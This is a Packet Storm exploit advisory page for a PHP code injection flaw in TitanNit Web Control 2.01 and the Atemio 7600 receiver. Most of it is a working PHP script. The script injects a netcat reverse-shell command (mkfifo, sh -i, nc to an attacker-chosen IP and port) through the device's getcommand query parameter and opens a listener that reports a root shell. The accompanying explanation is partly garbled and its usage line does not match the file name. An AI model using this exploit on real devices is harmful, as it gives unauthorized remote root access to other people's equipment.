what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

TitanNit Web Control 2.01 / Atemio 7600 Code Injection
Posted Oct 2, 2024
Authored by indoushka

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

tags | exploit, web, php
SHA-256 | ae322d271852c8f25de18f6d647d31c02a2bc3f366c6ee1f1c7d3ed36bff9c05

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

Change Mirror Download
=============================================================================================================================================
| # Title : TitanNit Web Control 2.01 / Atemio 7600 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |
| # Vendor : https://www.sat-world.com/Atemio-AM-520-HD-TitanNit-Edition |
=============================================================================================================================================

poc :

[+] Explanation:

We used the exec function to run the nc(netcat) command which subscribes to the subscriptions offered by the privileged execution.

In Windows environments, you can use the netcat tool for communications headsets.

Note: Make sure that netcat is installed on your system (you can download netcat for Windows).

[+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload :

<?php

class RemoteControl {

private $timeout = 10;
private $target;
private $callback;
private $path = "/query?getcommand=&cmd=";
private $lport;
private $cmd;

public function beacon() {
$this->cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc ";
$this->cmd .= $this->callback . " ";
$this->cmd .= $this->lport . " ";
$this->cmd .= ">/tmp/j";
$this->path .= $this->cmd;

$ch = curl_init($this->target . $this->path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}

public function slusaj() {
echo "[*] Listening on port " . $this->lport . "\n";
sleep(1);

// Windows solution using exec
$cmd = "nc -lvp " . $this->lport; // Example with netcat listener
exec($cmd, $output, $result_code);

if ($result_code == 0) {
echo "[*] Rootshell session opened\n";
foreach ($output as $line) {
echo $line . "\n";
}
} else {
echo "[!] Error in executing the listener\n";
}
}

public function tajmer() {
for ($z = $this->timeout; $z > 0; $z--) {
echo "[*] Callback waiting: " . $z . "s\r";
sleep(1);
}
}

public function thricer() {
echo "[*] Starting callback listener\n";

// Run listener in the background using exec
$this->slusaj();

echo "[*] Generating callback payload\n";
sleep(1);
echo "[*] Calling\n";
$this->beacon();
}

public function howto($argv) {
if (count($argv) != 4) {
$this->usage();
} else {
$this->target = $argv[1];
$this->callback = $argv[2];
$this->lport = (int)$argv[3];

if (strpos($this->target, "http") === false) {
$this->target = "http://" . $this->target;
}
}
}

public function dostabesemolk() {

}

public function usage() {
$this->dostabesemolk();
echo "Usage: php titan.php <target ip> <listen ip> <listen port>\n";
echo "Example: php titan.php 192.168.1.13:20000 192.168.1.8 9999\n";
exit(0);
}

public function main($argv) {
$this->howto($argv);
$this->thricer();
}
}

$control = new RemoteControl();
$control->main($argv);
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close